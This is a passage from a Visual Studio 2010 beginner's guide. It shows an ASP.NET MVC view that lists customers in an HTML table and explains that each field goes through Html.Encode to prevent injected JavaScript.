Microsoft 9GD00001 manual Microsoft Visual Studio 2010 a Beginner’s Guide

272Microsoft Visual Studio 2010: A Beginner’s Guide

<td>

<%= Html.Encode(item.CustomerID) %> </td>

<td>

<%= Html.Encode(item.Name) %> </td>

<td>

<%= Html.Encode(item.Age) %> </td>

<td>

<%= Html.Encode(String.Format("{0:g}", item.Birthday)) %>

</td>

<td>

<%= Html.Encode(String.Format("{0:F}", item.Income)) %>

</td>

</tr>

<% } %>

</table>

<p>

<%= Html.ActionLink("Create New", "Create") %>

</p>

</asp:Content>

Listing 9-8 organizes the list of Customers in a table. The tr tags are rows, th are header cells, and td are content cells. After specifying the header row, the foreach loop iterates on the Model to render each content row. If you recall from Listing 9-7, the Index action method called View with a List<Customer> (List(Of Customer) in VB). When creating the View, we specified the object type as Customer, which means that the reference to Model in the foreach statement is to List<Customer> and item contains a Customer object.

For each cell being rendered, item is the current Customer and the property for that cell is referenced by the property of Customer that should display. What is particularly important about displaying the data is that each cell uses the Html.Encode helper method instead of displaying the data directly. This is a best practice for best security to ensure that any data displayed is not treated as HTML markup or accidentally runs JavaScript that you didn’t intend. You see, a malicious hacker could add JavaScript during data entry and when you display that field, the browser would try to run the JavaScript code, which